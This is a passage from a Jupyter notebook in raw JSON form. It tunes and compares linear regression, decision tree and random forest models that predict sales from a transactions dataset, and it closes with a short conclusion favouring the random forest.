while..."},{"metadata":{"id":"5tvAeU4J2NgQ","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":674},"outputId":"c2845c6a-69aa-4193-b46c-a7f1439e9c1d","trusted":true},"cell_type":"code","source":"from sklearn.model_selection import KFold\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\n\n# Linear Regression\nfit_intercepts = [True, False]\nparam_grid_linear = dict(fit_intercept=fit_intercepts)\nlinear_model = LinearRegression()\n\n# Decision Tree\nmin_tree_splits = range(2,5)\nmin_tree_leaves = range(1,4)\nparam_grid_tree = dict(min_samples_split=min_tree_splits,\n                       min_samples_leaf=min_tree_leaves)\ntree_model = DecisionTreeRegressor()\n\n# Random Forest\nestimators_space = [100]\nmin_sample_splits = range(2,4)\nmin_sample_leaves = range(1,3)\nparam_grid_forest = dict(min_samples_split=min_sample_splits,\n                       min_samples_leaf=min_sample_leaves,\n                       n_estimators=estimators_space)\nforest_model = RandomForestRegressor()\n\ncv = 5\n\nmodels_to_test = ['LinearRegression','DecisionTreeRegressor','RandomForest']\nregression_dict = dict(LinearRegression=linear_model,\n                       DecisionTreeRegressor=tree_model,\n                       RandomForest=forest_model)\nparam_grid_dict = dict(LinearRegression=param_grid_linear,\n                       DecisionTreeRegressor=param_grid_tree,\n                       RandomForest=param_grid_forest)\n\nscore_dict = {}\nparams_dict = {}\nmae_dict = {}\nmse_dict = {}\nr2_dict = {}\nbest_est_dict = {}\n\nfor model in models_to_test:\n  regressor = GridSearchCV(regression_dict[model], param_grid_dict[model], cv=cv, n_jobs=-1)\n\n  regressor.fit(X_train, y_train)\n  y_pred = regressor.predict(X_test)\n\n  # Print the tuned parameters and score\n  print(\" === Start report for regressor {} ===\".format(model))\n  score_dict[model] = regressor.best_score_\n  print(\"Tuned Parameters: {}\".format(regressor.best_params_)) \n  params_dict = regressor.best_params_\n  print(\"Best score is {}\".format(regressor.best_score_))\n\n  # Compute metrics\n  mae_dict[model] = mean_absolute_error(y_test, y_pred)\n  print(\"MAE for {}\".format(model))\n  print(mean_absolute_error(y_test, y_pred))\n  mse_dict[model] = mean_squared_error(y_test, y_pred)\n  print(\"MSE for {}\".format(model))\n  print(mean_squared_error(y_test, y_pred))\n  r2_dict[model] = r2_score(y_test, y_pred)\n  print(\"R2 score for {}\".format(model))\n  print(r2_score(y_test, y_pred))\n  print(\" === End of report for regressor {} === \\n\".format(model))\n  \n  # Add best estimator to the dict\n  best_est_dict[model] = regressor.best_estimator_\n\n","execution_count":null,"outputs":[]},{"metadata":{"id":"SwIYIT1QC4yS","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":315},"outputId":"a6b94f76-815c-495e-fafc-eed8a452f409","trusted":true},"cell_type":"code","source":"# Creating summary report\nsummary_cols = ['Best Score']\nsummary = pd.DataFrame.from_dict(r2_dict, orient='index')\nsummary.index.name = 'Regressor'\nsummary.columns = summary_cols\nsummary = summary.reset_index()\n\n# Visualizing results\nplt.figure(figsize=(12,4))\nplt.xlabel('Best score')\nplt.title('Regressor Comparison')\n\nsns.barplot(x='Best Score', y='Regressor', data=summary)","execution_count":null,"outputs":[]},{"metadata":{"id":"ns3-4B4sD5pe","colab_type":"text"},"cell_type":"markdown","source":"# Conclusions\n"},{"metadata":{"id":"anKJ0JZFELV4","colab_type":"text"},"cell_type":"markdown","source":"This is a basic analysis of a transactions dataset with a model that predicts sales. Still a lot of things can be improved:\n\n\n*   Perform cluster analysis and create features based on it\n*   Make a deeper split of dates\n*   Get more insights from Descriptions and Stock numbers\n*   Compare domestic and abroad sales\n*   Try deep learning models\n\nAlso we can play much more with tuning of hyperparameters of our models and give it more time for training.\n\nRandom Forest Regressor appears to be the best model for our prediction with R2 score more than 0.6 which is not that bad. \n\n"}],"metadata":{"colab":{"name":"Data Scientist test2.ipynb","provenance":[]},"kernelspec":{"name":"python3","display_name":"Python 3"}},"nbformat":4,"nbformat_minor":1}


--------------------------------------------------------------------------------